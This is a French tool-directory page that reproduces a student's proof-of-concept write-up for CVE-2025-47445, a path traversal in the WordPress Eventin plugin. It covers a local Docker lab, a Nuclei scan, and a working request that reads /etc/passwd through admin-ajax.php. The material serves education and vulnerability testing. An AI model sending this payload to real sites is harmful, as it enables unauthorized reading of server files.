Skip to content
KitploitKITPLOIT
OutilsExploitsBlog
Log in
Soumettre
OutilsExploitsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-47445-PoC — Exploit de preuve de concept pour CVE-2025-47445, une vulnérabilité de traversée de chemin dans le plugin WordPress Eventin. Inclut des instructions de configuration pour un environnement Docker local et des étapes d'exploitation manuelles. | Kitploit
Outils/GitHubGitHub/inverterad/cve-2025-47445-poc
Analyse des VulnérabilitésExploitationExploitation d'Applications WebSécurité WebTests d'IntrusionApprentissage et Éducation
GitHubinverterad/cve-2025-47445-poc

CVE-2025-47445-PoC

Exploit de preuve de concept pour CVE-2025-47445, une vulnérabilité de traversée de chemin dans le plugin WordPress Eventin. Inclut des instructions de configuration pour un environnement Docker local et des étapes d'exploitation manuelles.

Voir le dépôt
8il y a 7 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Preuve de concept CVE-2025-47445

Cette preuve de concept est basée sur un devoir scolaire où nous voulions trouver un plugin wordpress vulnérable et tester ladite vulnérabilité dans un environnement local contrôlé.

Info
Plugin Wordpress:Wordpress Eventin
Version du plugin:4.0.26 (ou plus ancienne)
Informations CVE:Project Discovery - Bibliothèque des vulnérabilités
CVEdetails.com
Outils d'intérêt:Environnement de laboratoire Wordfence
Docker
Burp Suite
Nuclei

Configuration de l'environnement

Worfence Docker WordPress Research Lab propose deux environnements différents, l'un avec une version PHP plus ancienne, nous opterons pour le plus récent.

# In the dockerwp84 folder
docker-compose build
docker-compose up -d

Après cela, j'ai configuré la page Wordpress via localhost:1337. J'ai téléchargé le plugin Eventin, spécifiquement la version 4.0.26 depuis la boutique de plugins et je l'ai installé et activé via l'interface Wordpress.

Maintenant, tout devrait être prêt.

DAST / Nuclei

Je veux voir si Nuclei peut trouver la CVE que je recherche, donc j'exécute une instance via un conteneur docker temporaire.

docker run --rm projectdiscovery/nuclei -u http://host.docker.internal:1337

J'ai essayé d'exécuter Nuclei plusieurs fois et j'ai obtenu des résultats différents, je ne sais pas pourquoi. Mais finalement, il trouve la CVE, ainsi que quelques autres choses que je ne cherchais pas spécifiquement.

Nuclei screenshot

Burp / Test manuel

Pour voir si je peux accéder au fichier /etc/passwd, je saisis simplement la charge utile suivante dans ma requête GET.

/wp-admin/admin-ajax.php?action=proxy_image&url=/etc/passwd

Et ce fut un succès.

Burp screenshot

Conclusions

Ceci a été fait à des fins éducatives.

Assurez-vous de mettre à jour tous vos logiciels. De nouvelles CVE sont découvertes chaque jour.

Télécharger l’outil